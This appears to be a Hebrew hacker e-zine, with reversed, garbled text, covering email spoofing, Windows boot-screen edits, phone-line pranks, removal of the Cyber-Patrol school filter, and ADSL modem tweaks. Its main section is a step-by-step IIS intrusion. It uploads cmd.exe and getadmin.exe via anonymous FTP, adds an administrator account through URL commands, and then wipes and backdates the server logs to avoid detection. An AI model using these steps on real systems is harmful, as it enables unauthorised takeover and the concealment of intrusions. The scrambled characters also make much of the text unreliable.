.ליימיאה לש דחוימה תוהזה רפסמ ןה הדוקנה ירחאש תורפסה
ב חלשנ הזש הפ בותכ "עגר 9: -ה בותכ היה ומצע ליימיאב לבא "לירפאב J "לירפאב
ןויליג !הז קר אלו = ב קר אצי 9* .ףיוזמ ליימיאהש החכוה דוע הנה .לירפאב והשמו
.#יראת ףייזל הצרי והשימש המל .ףיוזמ #יראתה םג אלא !הז קר אלו
...יתוא ולאשת לא
.ףיוזמ תמאב אוהש אדוול יתטלחה ןכלו !תוקפס יל ויה ןיידע !תאז לכב
- ן'זיווטנמ חלשנ אוהש םיעדוי ונחנא תרתוכה יפל 4ailgw9%netVision%net%il !
מ חלשנ אוהש בותכ לבא walla%co%il םהש יתיארו ן'זיווטנ לש רתאל יתכלה זא .
אל ןכלו הלאוו לש הרחתמה יתעידי בטימל אוהש ענענ שופיחה עונמ לע םיצילממ
יתחתפ !הללאול םג יתסנכנ ףיכה ליבשב םתס .ן'זיווטנ לע םיבשוי הללאוש ינויגה
$יתדלקהו סוד ןולח
tracert www%walla%co%il
...יתלביקש המ הזו
, 4s 9J+ 4s 9N= 4s diuI!9*9!J%inter%net%il [9+3%.%9*9%J 9=N +
, 9 9=3 4s 9J+ 4s 9N= 4s diuI!9*9!+%inter%net%il [9+3%.%9*9%+
3 9JJ 4s 3;9 4s 39N 4s 9+3%.%.%+=3
: 9JN 4s 9N3 4s 9J+ 4s +;9%++J%9*9%+=.
= 9=9 4s 9N: 4s 9N: 4s +;9%++N%+=;%99
. J 0 0 0 ReOuest ti4ed out
. N 0 0 0 ReOuest ti4ed out
.
הדוקפה tracert #רד תרמוא תאז !הללאול חלשנש עדימה רבוע םיביתנ הזיאב תקדוב
.)בהז טנרטניא( ילש בשחמל תורושק תונושארה תורושה יתש .םיבשחמ הזיא
!יללכ עדי ליבשב םתס .ן'זיווטנל אוהשכיא רושקש רבד םוש םש יתאצמ אל
דוע #רד רבוע עדימהש בל ומיש 9 ינשש ןוויכמ - בהז טנרטניא לע םיאצמנש םיבשחמ
-ב םיליחתמ םייפ-ייא 9+3%.%9*9 רמוא הז זא ילש יפייאה םתסה ןמ אוה םהמ דחא .
- הרעשה דוע .יל חלוש אוהש ינפל םינותנה תא לבקמ בהז טנרטניא לע בשחמ דועש
.ן'זיווטנל אלש חטבו רבד םושל רושק אל !דרפנ תרש לע אצמנ הלאוו
.םישוע המ זא !בוט
ן'זיוטנש יתיליג רצק רוריב ירחא ל-ב-א .חלשנ ליימיאה הנממש תבותכה תא ונל שי
זאו !)םירתאל שיש ומכ !םיעובק םייפייא תרמוא תאז( םייטטס םייפייא תונתונ אל
.רחא יפייא םילבקמ םירבחתמש םעפ לכ
.תרש ותואמ וחלשנש תועדוה לש םושיר שי טעמכ ליימ תרש לכ לע !םכל יתרמאש ומכ זא
.ילוכו הפיאמ חלש ימ קוידב תעדלו קודבל לוכי תרשה לש להנמה
NJ
ל ליימיא יתחלש abuseknetVision%net%il ליימיאה תבותכ תא יל ונתיש םהמ יתשקיבו
#יראתב חלשש ימ לש תיתימאה 9:%:%9**+ יפייאהמ J9%*%+:N%9 רפסמ םע העדוה
תוהז P""9J;;9 םיטרפ םוש יל רוסמל םילוכי אל םה טפשמ תיב לש וצ ילבש ונע םה .
($ .םישנא לש תונובשח לע
%ורפל איה הביטנרטלאה( הז ימ יל ררבל לוכיש דיחיה אוה ןזיוטנ להנמ ...בוט
תונובשח ונמסריפש הז לע לצנתהל יתיצר קר ינא .תושעל המ ןיא זא )...ן'זיווטנל
)$ ...קנב
ל יתטנלט !ףיכה ליבשב םתס 4ailgw9%netVision%net%il - לו s4V3:N!ec%4ail%co4
טרופ 9= יוהיז תדוקפ שקבמ אל תרשה . helo .ףויזה לע לקמ הז "
םיינ ןיימוד לכמ ףייזל םינתונ םה - םהב בוט יכה רבדהו !תמאה םידמחנ יד םיתרש
.)םהלש םימיינ ןיימודה לש תובותכל קר ףייזל םינתונש הלאכ שי( .םיינ ןיימוד לכלו
הז ימ קודבל םג יתיסינ J9%*%+:N%9 עגר ותואב רבוחמ היהש
הדוקפה יע הז תא יתיליג( Ping תועצמאב תצק יתרקח .) netstat ו nbtstat יתיליגו
$הזל בל ומיש !לארשי םשב דומח בשחמ
1ero &ool &h<8,N$683jnbtstat !a J9%*%+:N%9
NetB,63 Re4ote Machine Na4e #able
Na4e #)Ie 3tatus
---------------------------------------------
,3R"7 r**j MN,gM Registered
N6N r**j GR6MP Registered
,3R"7 r*3j MN,gM Registered
M"& "ddress n ::!:=!=3!=:!**!**
=:!**!**
.יתיצרש בשחמה אל הז אליממ בוט ..םיפותיש ..יפוי הזיא
..הזה ןגלובמה טסקטהמ ונל אצי ןכ המ זא
תצקו ףיוזמ אוה םאה !חלשנ אוה הפיאמ תעדל .ליימיא לש רוקמ רתאל #יא ונדמל
.)..שי ..םילשורימ אוהש םיעדוי ונחנא( חלושה לע םיטרפ
ןומה ררבל םילוכי ונייה יטטס היה ליימיאה חלשנ ונממ יפייאה םאש בל ומיש
.םשל %ורפל םג ילואו חלושה בשחמה לע םיטרפ
םירבד ליכהל תולוכי דואמ תונשי תואסרג .הנכות תואסרגל בל םישל םג ונדמל
.םימעפל דואמ םיניינעמ
ליימיא םיפייזמ ונחנאשכש ונדמל !ןכו !םיליימיא לש תוהז ירפסמ לע ונדמל
וקדבו םינוש םיתרש וסנ !בוט ףייזל םיצור םתא םא .תולקב ונילע תולעל רשפא
.בוט יכה המ תוארל ידכ תורתוכה תא
הדוקפה תא ונרכה tracert עדימ תרבעה ירחא בוקעל ידכ הברה ונתוא שמשתש
.םיבשחמ ןיב
בשחמ םגו םניחב הצרנש המ לכ ונל ופייזיש םיביבח ליימיא יתרש ינש ונאצמ
.%ומיאל קוקזש לארשי םשב דדוב
!הווקמ ינא ןיינעמ היה םכל !םולכ הזמ אצי אלש תורמל ףיכ היה יל זא !בוט
.שדח והשמ םתדמל תוחפל אל םא םגו
!ייב
םולש !תוארתהל
ףוסה קר הז !רמגנ אל הז
!דימת תבהוא
NN
Blood Runner
N.
יוביכ/הלעפה יכסמ תפלחה
ךוניחה תכרעמ לש ומכ תודסומו תורגסמב הזכ תויהל לדוג אוה (לבהא דלונ אל םדאנב$
$.לארשיב
)םונהיג(

)0()0(
( )
) (
..ינא המ וא ימ ושחנ
אלא !האלמ הטילש שמתשמל תנתונ הניא סודניוו הלעפהה תכרעמ !סקוניל תכרעמב ומכ אלש
.#פיהל
תתל תומש הזיא רוחבלו !הדובעה ןחלושב עקרה תנומת תא ףילחהל םילוכי םתא ילוא זא
לבא םיצבקל
םויה .תיספא !בשחמב םכלצא תנקתומש הלעפהה תכרעמ לע םכלש הטילשה חוכ רבד לש ופוסב
..הנתשיי הז לכ
למס תא שי !בשחמה תא םיקילדמ םתאשכ !םכבור לצא .דומח והשמ םכתא דמלא ינא לבא .אל
סודניוו לש תונולחה
$בותכ הטמל .לוחכ עקר וירוחאמו
MicrosoQt 8indows ;.
וא
MicrosoQt 8indows ;=
$ומכ והשמ בותכו !רוחש #סמה םכבורל זא !בשחמה תא םיבכמ םתאשכ !הזמ %וח
לכב .ןווכתמ ינא המל םיעדוי םתאש דואמ הווקמ ינא .םותכ עבצב 'בשחמה תא תובכל ןתינ תעכ'
!הרקמ
םתא םא( םתוא תונשל םידמוע םתא םויה !יוביכ(הלעפהה יכסמ םכלצא םיארנ #יא הנשמ אל
#יאל )םיצור
הז םא הנשמ אל .םכילע בוהאה הקיפרגה #רוע תא וחתיפ .ואריי םהש םיצור םתאש Paint 3hot
Pro !
וא PhotoshoI !םכל ןיאש םיבשוח וא הקיפרג #רוע הז המ םיעדוי אל םתא םא .רחא רבד לכ וא
וצלאית
תנכות וז ירה !םכלש סודניווה תכרעמ םע דחי עיגמש טושפ דחאב שמתשהל M3 Paint .
...הלעפה 7- לחתה לע וצחל התוא ליעפהל ידכב
$ודילקה חתפנש ןולחב
&h<Progra4 -iles<"ccessories<4sIaint%e'e
/ ה שקמ לע וציחלו nter םע התוא ונמס !תאזה הרושה לכ תא ודילקתש יתנווכתה תמאב אל .7
וציחלו רבכעה
לע &trl s & לע וצחל ...הלעפה ןולחב .הקתעה תלועפ עצביי הז . &trl s 0 תלועפ עצביי הז .
הקבדה
%בוקה תא וחתיפ תעכ .םכלש יפרגה #רועה #ותב םיאצמנ םתא זא .הדלקהה לכ תא וכסחת הככו
$אבה
&h<logo%s)s
$תא וסנ %בוקה תא חותפל חילצמ אל הז םא .הקיפרגה #רוע #ותב ותוא וחתפתש בושח
&h<iI%s)s
%בוקב אוה לזאזעל המל .סודניוו לש הלעפהה #סמ תא וישכע םכינפל שי בל םימש םתאש ומכ
...תכרעמ
( s)s ).
היהיש םיכירצ ויה ינש דצמ !%בוקה תא איבחהל םיכירצ ויה דחא דצמ טפוסורקימ יכ
ול םורגל םתורשפאב
ובש רחא קסידמ שדחמ ןיקתהל ילב !בשחמב הנקתוה רבכ הלעפהה תכרעמש ירחא םג םייוניש
ושענ םייונישה
המל יכ םכח רבד !תכרעמ %בוק #ותב יוביכ(הלפעהה יכסמ תא ורמש םה זא .ומצע תונכיתב
והשימש לזאזעל
N;
.....הלאכ םיצבק םע קחשי םלועב ימ ...בשחמה תא סורהי כדב הז .תכרעמ %בוק םע קחשיי
#יאל הלעפהה #סמ תא תונשל ידכ םכלש הקיפרגה תנכותבש םילכב ושמתשת זא !בוט .ונחנא
.הארייש םיצור םתאש
לש וליפא וא !אמגודל ןוסנמ ןילירמ לש( תרחא הנומת תחקל םילוכי םג םתא םיצור םתא םא
רומשלו !)םכימצע
%בוקה םש לע התוא &h<logo%s)s
"""עיפוי הז בשחמה תא וליעפתש םעפ לכב זאו
בחור לדוגב היהת הנומתהש דואמ בושח !ןטק דחא רבד קר 39* הבוגו :** לדוג .םילסקיפב
בושח אל %בוקה
אל הפ %בוקה לדוג לבא !יתמזגה ילוא בוט( .רדסב הז טייבהגמ האמ לש הנומת תאז םא םג זא
.)ינורקע
ל הנומתה לדוג תא ונשו יפרגה #רועה םע התוא וחתיפ םיאתמה לדוגב אל םכלש הנומתה םא זא
39* לע :** .
$%בוקה תא וחתיפ יפרגה #רועה #ותב .יוביכה יכסמ .ונל ראשנ דוע המ
&h<windows<logow%s)s
$תא וחתיפ תעכ
&h<windows<logos%s)s
%בוקה לע יתרבסהש המ לכ &h<logo%s)s םכל הארנ אל ילוא הז .הלאה םיצבקה יבגל םג ןוכנ
הזכ רבד
יתיא ומיכסתש בשוח ינא !םיבשחמ םש םכל שי םא !רפס תיבל ועיגתש האבה םעפ לבא !בינגמ
ףייכ יד היהיש
וא ונרופ תנומתב יוביכ(הלעפהה יכסמ תא ופילחת םא קיחצמו 3chool 3ucks """"
םכלש םונהיג (
.*
םישומיש םירפסמ
"םלוכל םולש
.הינופלט לע הבוט הבתכ התייה אל ןמז הברה
.והשמ אל ןיידע תאזה הבתכה םג
.והשמ הז תוחפל לבא
.קזב לש ליגר ןופלטל םיידוס םירפסמ המכ דמלנ םויה
!ןופאלפ ('גנרוא ( םוקלס לש םינופאלפל םידוקה תא םיריכמ םלוכ טעמכ
.ריכמ אל דחא ףא טעמכ קזבל םידוקה תא לבא
$ןושאר דוק ++* .
וגייחו !ןופלטה תא ומירה טושפ ++* ...תא םכל אירקתש הטלקה םכל הנעת .
$הנה זא .םתלאש !לזאזעל ישומיש הז המל "םכלש ןופלטה רפסמ
רפסמל #ייש םיוסמ עקש םא קודבל םיצור םתאו !תיבב םיווק המכ םכל שי םא -
.ינשל וא דחא
.ולש ןופלטה רפסמ תא םכל תתל ברסמש !תיבב והשימ לצא םתא םא -
ורשקתיש ידכ ולש רפסמה המ תעדל םיצור םתאו !ירוביצ ןופלטב םתא םא -
.הרזח םכילא
.שארב םכל הלועש רחא רבד לכ -
$ףסונ דוק ++3 .
וגייחו !ןופלטה תא ומירה טושפ ++3 רתוי םיריהמ !םיפוצפצ המכ ועמשת .
.סופת לילצמ רתוי יטיא לבא !םכל םינועש דעו םיגייחמש ירחא שיש לילצמ
םירבוחמ אלש םינופלט "תומי טושפ םכלש ןופלטה וק !הלאכ םיפוצפצ המכ ירחא
לועפל ללכב וקיספי !הריכזמ ילבו םייטוחלא אל םיטושפ םינופלט ינעי !למשחל
.עקשהמ םתוא םתאצוה וליאכ
#רעב קר !ינמז הז $רבד דועו 9 ירחא .תוקד 9 אוהש ירחא .רוזחי וקה תוקד
םוקמב תרפרופשה תא וחינת זא לבא !םדוק ומכ םיפוצפצ השעי אוה הלחתהב !רזוח
.רדתסי הז הקד הזיא דוע #ותו
)וישכע וו ה'זד יל שי( $הנה זא .םתלאש !לזאזעל ישומיש הז המל
!וקה תא ול גורהל !החיש תושעל ונממ שקבל - ולצא םתאש והשימ לע דובעל -
"הקינפל סנכנ אוהו !ול םיארמ !דבוע אל וקהש ול דיגהל זאו
$דוק דוע ++: .
ליחתי טושפ אוה זאו !גויח ירחא לש הנתמה לילצ היהי !ותוא וגייח טושפ
.אל הז .בוט הז המל .עגושמ ומכ ףצפצל
$אבה דוקה ++9 .
תועצמאב גויחה - ימואל ןיב ליעפמ רחב אלש ימש !םיעדוי חטב םתא ** וא +..
םע גייחל הסנמ אוהשכו !וליבשב םסחנ ** וא +.. אל אוהש העדוה לבקמ אוה זא
רפסמה לא ירחא בוקע םע הנפומ אוה !םצעב .לוכי ++9 .העדוהה תאצמנ םש !
וגייחת םא זא ++9 .העדוהה תא ועמשת
תועצמאב גויחה תוריש דיגהל דומלל רשפא .לזאזעל בוט הז המל ** -ו +.. םוסח
.תיסורו !תיברע !תילגנאב
לע םיצחולש( םיפקתמב גייחמש !ןשי ןופלט םכל שי םא $ןטק פיט = םיעמוש ! =
%וחלל םכממ םישקבמש ןופלט יתורש ינימ לכב שמתשהל םילוכי אל םתא זא )םיקותקת
ינפל 0 וגייחת םא !הלאה םינופלטהמ קלחב זא .םהינימל םירסמלט לשמל ומכ !םירפסמ לע
.לילצ שי שקמ לכלש !תילמרונה הטישה - םילילצ גויחב גייחי ןופלטה !רפסמה
$ול םיארוקש שדח םש ופיסוהו ולש םינופלט רפסל וסנכ !ןופאלפ םכל שי םא
.+
u4oI aIis dn
"ולגו ןופלטה תא וכפה .ןאכ בותכ המ
"ןופלטב תוניגנמ
-------------------
39+9333!999!333!39+9333!9939+!+
)שקמה לע ןמז רתוי םיצחול - שיש הפיא(
.ןטק הלט םירמל רישה תא ועמשתו - םיגייחמ םתאש ןמזב ובישקתו - הזה רפסמה תא וגייח
.הניגנ םידמולשכ םידמולש ןושארה רישה הז יכ הזה רישה תא ריכמ !הניגנ םעפ יא דמלש ימ
N:.J+J. הזכ והשמ וא 0 גייחל יאדכ "ינרב לש הלחתהה תא ועמשתו הזה רפסמה תא וגייח -
.םכל תונעל יושע והשימו םייק תמאב הזכ רפסמ יכ !םדוק
++3+999 .דואמ ןטק םלוע הז -
םייתניב והז זא
!ייב
.!נב
.9
לרופ'רבייס תנכות לורנ
"ייה
!טנרטניא ירתאל רטליפ תנכות תאז .לורטפ-רבייס הנכותה תא םיריכמ חטב ןאכ םלוכ
.'וכו סקס ירתאל ושלגי אל םידימלתהש ידכ הב םישמתשמ רפס יתב הברהש
בשחמה תא ןיטולחל תמסוח איה !תינדי התוא קוחמל םיסנמ םאש !תאזה הנכותה םע היעבה
.סודניוו תא וליפא ליעפהל םכל תנתונ אלו
!םירוסא םירתא המכב םכשפנ הקשחו לורטפ-רבייס תא שי םכלש רפס תיבב םא זא
.המסיסה ילב םג לורטפ-רבייס תא ףוקעל היעב אל שממ וז
'סמ ןויליגל ונפת !אל םאו !סוד תא תצק םיריכמ םתאש החנה תדוקנמ אצוי ינא 9 לש
!םוניהיג
.סוד לע תצק םש ריבסמ אוה
----------------------------------------------------------------------------------
לורטפ רבייס וב שיש רחא בשחמ וא רפס תיב לש םיבשחמב קר הז תא ושעת $הבושח הרעה
שממשו
אל %בוק וקחמת תחא תואב ועטת םאש תויהל לוכיש ללגב .המל .בשחמהמ םכל תפכא אל
ןוכנ
.אל !סקס ליבשב ושעת לכה לבא .בשחמה תא וסרהתו
----------------------------------------------------------------------------------
$הז תושעל #ירצש המ לכ
+ תא ליעפהל רמולכ !)סודניוו #ותמ סוד אל( יתימא סוד בצמב בשחמה תא ליעפהל .
בשחמה
-ףא לע %וחללו !שדחמ . תורשפאה תא םש םירחוב .לוחתיא טירפתה עיפומש דע
&o44and Pro4It 6nl)
.סוד בצמל םיעיגמ זאו
9 %בוקה תא םיקחומו !סודניוו לש הירפסל םיסנכנ . "#M%3L3 ידוסה %בוקה והז -
השועש
הז תא לבא - ןגומ תויהל רומא %בוקה .הלעי אל סודניוו הנכותה תא וקחמת םאש
$הככ םיפקוע
attrib !r !s !h at4%s)s
תא םתרסהש ירחא .סודניוו לש הירפסל םתסנכנש ירחא קר םישוע הז תאש ןבומכ
תא וקחמ !הנגהה
$הככ %בוקה
del at4%s)s
3 $)לאמשל רושיי ושעת( סודניוו לש הירפסב ןיידע םתאש הז תא םיבתוכ .
attrib !r !s !h 3L3#M%3.J
attrib !r !s !h s)ste4<s)ste4%drV
coI) s)ste4%3.J s)ste4<s)ste4%drV
.ןכ לע וצחלת !לאוש אוה םא
del s)ste4%3.J
.םיצבק ינשל הקיחמה תנגה תא ונרסה $תעדל הצורש ימל !הפ ונישעש המל רבסה
.םטסיס %בוקה תא 3.J זאו ברד.םטסיס %בוקה לע ונקתעה סודניוו לש הירפסהמ
.םטסיס %בוקה תא ונקחמו 3.J .
: הירפסה תא ןיטולחל םיקחומ . ch<Iatrol
.3
= .רדסב הז !םימייק אל םה םא .סודניוו לש הירפסב !םיאבה םיצבקה תא םיקחומ .
.םכל שי לורטפרבייס לש הסרג הזיא יולת הז טושפ
ilc%e'e
iic%e'e
lic%e'e
llc%e'e
ic%e'e
lc%e'e
icQire%e'e
lcQire%e'e
icI%log
lcI%log
nt+J%dll
ts%dll
ts+J%dll
ts39%dll
tsnt%dll
tsnt'%e'e
usage%log
usage=%log
llc%e'e
J םטסיס וא םטסיס היירפסהמ . 39 %בוקה תא וקחמת סודניוו לש הירפסה #ותבש
is)ste4%drV ו ls)ste4%drV
"לורטפ רבייס ןיא "והז .ליגרכ סודניוו תא וליעפתו טסיר ושעת וישכע
לורטפ רבייס תא ליעפמש המ תא ירטסי'גרהמ וקחמת !שממ שממ תוקנל םיצור םתא םא
$הככ
%בוקה תא וליעפת - regedit%e'e
-ה תא וקחמת - registr) ke)s $ולאה
H/LP76&"7PM"&H,N<36-#8"R<&LBR P"#R67
H/LP76&"7PM"&H,N<36-#8"R<M,&R636-#<8,N$683<&MRRN#0
R3,6N<RMN<&LBR
P"#R67
H/LP76&"7PM"&H,N<36-#8"R<M,&R636-#<8,N$683<&MRRN#0
R3,6N<MN,N3#"77<&LBR
P"#R67
וניקתיו הז לע הלעי רפסה תיבש דע תוחפל "רוזחי אלו #לה לורטפ רבייס "ונרמג "והז
ותוא
םתאו .םעפ דוע ותוא וניקתיו הז לע ולעי םהו .םעפ דוע ותוא וקחמת םתאו .םעפ דוע
.וקחמת
.אלש וא .רפס תיב תא ומייסתש דע הככו
!הנורחאה םעפל דע ייב זא בוט
.!נב
.:
םייולפסקאל תואמגוד * םירתאל הצירפ
Hello 4otherQucker
$ .םכמולש המ ;
$תוביס המכמ הזו ינממ תובתכ ויה אל ןמז הההההברה רבכש םתיאר חטב
"""""רררררררררפפפפפס תתתתתייייבבבב יייייתתתתממממייס .א
)תונקז ונסרדו הלוק ונצפקה( .גוגחלב הקוסע יתייה זא
פ-ה הבתכ-ה ב התוא םכל איבהלב הקוסע ינא .ב 33 לא !ינאה םונהיג( םש העוקת דוע ינא לבא ה
לע םלש רפס דומלל #רטצא ינא !הכחת "3P )..הז ליבשב
הלוכ !םתס( םויה לכ םיריש יתבתכ .ג 9 .רכממ ריפסקייש 7- )
.םכילע יל אב אל .ד
םתיאר העש יצחמ תוחפ ירחאו םתינע אלו םכילא רשקתה והשימש םעפ הרק ודיגת $ימלוע איש
3; .)וישכע #ייחמ חטב פיז( .ונענ אלש תוחיש
שיש וווהז זא .הנשה םירקאהה סנכ לע םינש ינפל םכל יתרמאש םירכוז $תושדח תצק וישכעו
ינא בורקב דואמ זא )ןגראמ לש הצלוח יל היהי בלה תא ולכאת( אבה עובשב םינגראמ תשיגפ
.הרוק המ עדא ינא רבכ םסרפתת תאזה הבתכהש דע חטב .שדח המ םכל דיגהל רתוי המכח היהא
תוכרעמ %ורפל #יא םויה ודמלת םתא .הככ שממ "םירתא תצירפל הטיש דמלנ !םידלי םויהו
םשב הייקיתל השיג םוסחל וחכשש םישפט םילהנמ םע תועיגפ cgi!bin ""
לע תובתכ תרדסב הנושארה הבתכה יהוז ,,3 $
)תונלולבשב ורזאה אנא זא !ראשה תא םסרפל ןמז דוע יל חקיש ןכתיי(
הז המ קמועל רתוי ריבסא ינא אשונב תואבה תובתכב ,,3 ןיינעה #רוצל ןכלו !תדבוע איה #יאו
...תא גיצהל האג ינא זא .תויללכב שממ ןאכ יתרבסה
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
,,3 H"&/,NG N6%+ h H68 #6 H"&/ #HR6MGH #H &G,!B,N
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
גישהל שממ !ןכ ןכ ad4in rights ...
%ירמה תרש הז המ זא ,,3 .
ב תשמתשמה תכרעמ יהוז ,,3 X,nternet ,nQr4ation 3erVer תונכותו טנרטניא תרש הזש )
...רמוא הז המ םיעדוי םתאו ...ווווא .טפוסורקיימ לש .טנרטניאה לוהינל
ב שמתשמ אוה םא ועדת #יא .תמייוסמ הרבח לש רתא םירקוח םתא המגודל ,,3 ןתינ בורל .
טרופ #רד הז תא גישהל .* ושיקת םא ולבקתש האיגשה תעדוהב וננובתה . get H##P םתס וא
$תויוטש
H##P/+%+ :** Bad ReOuest
3erVerh MicrosoQt!,,3/:%*
$ateh 8ed, 3* Ma) 9**+ 9*h:Nh3+ GM#
&ontent!7engthh :*N
&ontent!#)Ieh te't/ht4l
%ירמ אוהש ונל עידומ תרשה ,,3 .
$הצירפה
ה תא וסנ ...בוט -#P טרופ . 9+ םשב סנכהל וסנ !תרש ותוא לע ןובשח םכל ןיא םא .
anon)4ous
$ודילקה !סוד ןולחב(
QtI www%Victi4%co4
$ביגי בשחמה
&onnected to www%co4Ian)%co4 .
.=
99* 0,&#,M MicrosoQt -#P 3erVice X0ersion 3%* .)
(( Mser h Xwww%co4aIn)%co4hXnone
$ודילקה
anon)4ous
.והשמ ואיצמה .המסיס רותב ליימיא תבותכ שקבי תרשה
Iassword geheno4kunderground%co4 )
$ולש םשה תא רמא תרשהש בל ומיש !תעכ 0,&#,M MicrosoQt -#P 3erVice X0ersion 3%* .)
אוה תרשה םש 0,&#,M ה תכרעמבש !רמוא הז . ,,3 ה ןובשח anon)4ous ארקי
,M3RP0,&#,M .רתוי רחואמ שומישל תאז רוכזנ .

הירפסל םיצבק תולעהל האשרה םכל שי םא קרו #א דובעת תאזה הטישה cgi!bin סנכהל וסנ .
תועצמאב וז הירפסל
cd )רטנא לע וצחל(
cgi!bin .
$הדוקפה !םתא הירפס הזיאב קודבל ידכ( Iwd .)
ילב היקיתל סנכהל םתחלצהש חיננ access denied טסקט %בוק ורצ .תרשל %בוק תולעהל וסנ !
$הדוקפה תועצמאב ותוא תולעהל וסנו המגודל קיר
Iut ch<4)te't%t't
$הלבקה תא רשאמו %בוקה תא לבקמ תרשהש וארת יוארכ עצבתת הדוקפה םא 9** P6R#
co44and successQul .
ודילקה
dir
.םיצבקה תמישר תא תוארל ידכ
ל %בוק תולעהל םתחלצה cgi!bin .םירדוסמ םתא .
ב םישמתשמש םכמ הלאל !תעכ N# םיצבקה תא םכל שי םא וקדב ! c4d%e'e, gas)s%dll ו
getad4in%e'e
לע אלש םכמ הלאל N# שופיחה עונמל וכל !לנה םיצבקה תא םהל ןיא לבא ןכש םכמ הלאל וא
ישמתשממ ושקב וא( .םיצבקה תא וגישהו םכילע ביבחה N# תא c4d%e'e, gas)s%dll לכב .)
תא !הרקמ getad4in%e'e .גישהל השק אל
ה תא וחתפ ...וווישכעו -#P ודילקהו !בוש
binar) )יראניב %בוק תלבקל תורשקתה תחיתפ(
זאו
Iut c4d%e'e
Iut gas)s%dll
Iut getad4in%e'e
ה תא ורגס -#P .
$ודילקהו םכלש ןפדפדה תא וחתפ !תעכ
httIh//www%co4Ian)%co4/cgi!bin/getad4in%e'ep,M3RP0,&#,M
$הנעי ןפדפדה
&G, rror
#he sIeciQied &G, aIIlication 4isbehaVed b) not returning a co4Ilete set oQ H##P
headers .
שמתשמל תעכש .רמוא הז המ םיעדוי םתא ,M3RP0,&#,M "לע שמתשמ לש תואשרה שי
םשב שדח ןובשח רוצינ ואוב .)ןימדא( geheno4 $היהת ותמסיסש underground ןולחב בוש .
ודילקה ןפדפדה
httIh//www%co4Ian)%co4/cgi!
bin/c4d%e'ep/cl9*ch<winnt<s)ste439<net%e'el9*userl9*geheno4l9*underground
l9*/add
!לע שמתשמ לש תויוכז הזה ןובשחל םג תתל ידכו
httIh//www%co4Ian)%co4/cgi!bin/getad4in%e'epgeheno4
.J
ל בוש ורבחתה תעכ -#P שמתשמה רותב םעפה לבא ! geheno4 המסיסהו Iassword .
ב םישמתשמ םתא םא "תכרעמב םיטלוש םתא וישכע "והז N# ב רזעהל םילוכי םתא Mser
Manager בו 3erVer Manager .תכרעמה לע טולשל ידכ
אל ינא( תכרעמ התוא לע תושעל םתמלח דימתש המ ושעת זאו !עגרה תא וגגחת !הלוק סוכ וחק
)יקאיינמ םתס הז !םיצבק קוחמל הצילממ
$ןויקינ
= ןנוכל סנכהל וחכשת לא & הירפסל )רתסומ( 8innt<s)ste439<logQiles לש גולה תא ןכדעלו
םכל השוע הז םא .שדחה גולה תא ורמש .םש םתייהש #כל רכז לכ קוחמל תרמוא תאז !םוי ותוא
$דישחהל אל ידכ גולה לש #יראתה תא ונש תוחפל !תויעב
httIh//www%co4Ian)%co4/cgi!bin/c4d%e'ep/cl9*datel9**9/*9/;.
( םתרציש ןובשחה תא קוחמלו !לעה שמתשמ תואשרה תא סומינונאהמ דירוהל וחכשת לא
geheno4 תרשל םתלעהש םיצבקה תאו )
( dele c4d%e'e
dele gas)s%dll
dele getad4in%e'e )
.תרשה תא ובזעו !ןכדעל םתחכשש םיגול דוע ןיא םא וקדב
ל השיג שיש הרקמב 0קר0 תדבוע הטישה יכ ןייצל שי cgi!bin דואמ הזו !םיצבק תולעהל תושרו
.עיגפ ככ תרש אוצמל רידנ דואמ
.דבוע הז המל
ב יכ ,,3 ה תיירפס cgi!bin םתילעה םא .%ירהל לוכי שמתשמהש םיטפירקס ןוסחאל תשמשמ
ונלש הרקמב( טייולפסקא םשל getad4in%e'e אז( תבותכה תרוש #רד ותוא %ירהל לוכי תרשה )
ל הלעומה %בוק !תרשה לע תורחא תוירפסל דוגינב .)ןפדפדה #רד cgi!bin 0ומצע0 תרשה לע %ר
%ורפיו המצע תכרעמה לע %ורי אוה טייולפסקא םשל םילעמ רשאכ ןכל "םכלש בשחמה לע אלו
.התוא
$םיטידרק
םשב %בוקמ יתדמל תאזה הטישה תא hacking!nt טנרטניאה לע אוצמל לק דואמש
ושפח םיניינועמל hacking!nt $םילימב ליחתמש %בוקה והז !
fohnn) Hacker has a 8indows N# 3erVer at ho4e .
ןמז תצק חקי הז םא יל וחלסת לבא !ןיינעב תובתכ דועל וכח
$rink disgusting &herr) &okes
and haII) hacking
!םכלש
.ידאלב
.N
םימדומב לבחל ךיא דעו םיעוציב רפשל ךיא
ב קפוסמ קזב לש ואוו תוריש .* .לארשי %ראב םירעהמ זוחא
זאו הנקתהל הנתמה עצוממב םייעובשב םיעקתנ התא תורישה תא םינימזמ םתא רשאכ
).םירקמה לכב אל( םיסאבתמ
#רד דבוע אוה קזב לש ואוו תוריש "$37 .
"$37 .ול םיליגר םתייהש הממ ההובג רתוי תוריהמב טנרטניאל רוביח אוה
!ןכ ומכ לבא רקשמ אוה )רקי יד הזו( הלוע הזש ףסכה תא הווש אל הזש םכל רמא והשימ םא
.ןרקש ןכ ומכ אוה הווש הזש םכל רמאש ימ
םדומ תא קלחו לטקלאה םדומ תא לבקמ רשא קלח !םיקלח ינשל %ראה תא תקלחמ קזב
.תיכרואה
$תילאטוט ותוא סורהל #יאו ויעוציבו םדומ לכ לע תצק
$ קזב לש לטקלא םדומ
-------------------------------------------------------------------------------------
.רוחש עבצב #וראו רעוכמ םדומ
.םתנעט תא חיכומ לקטלא םדומ לבא םהלש תלוביקב םילבגומ םימדומה לכש תרמוא קזב
.תורישהמ קתנתמ וליפאו תמ סאבתמ לטקלא ול שיש ריכמ ינאש ימ לכ
$םיאבה םיעוציבה תא םכל איבי לטקלא םדומ עצוממב
#est $
0 9:Jkb/s X$own )
0 ++kb/s XMI )
.םיעוציבה תא רפשל םיכרד שי ןבומכ לבא
+ .רחא םדומ לבקל זאו ריע רובעל .
9 .ולגי אל קזבש רהזיהלו הנקתהה תא תושעלו תיכרוא םדומ והשיממ תונקל .
3 %בוק ןיכהל . RG $ םינפב בותכלו שדח
------------------------------------------------------------------------------------
RG$,#:
+ H/LP76&"7PM"&H,N<3)ste4<&urrent&ontrol3et<3erVices<0'$<M3#&P ,
$eQaultRcV8indowunuJ:9:=
------------------------------------------------------------------------------------
.ונל %וחנ אל הז יכ טרפא אל ינא לבא יטסי'גרב םירבד המכ הנשמ םצעב הזה %בוקה
.םהמ ורזחת אלש םיקחרמל %ופקל אל ורהזית לבא חווטה םע קחשל םילוכי םתא
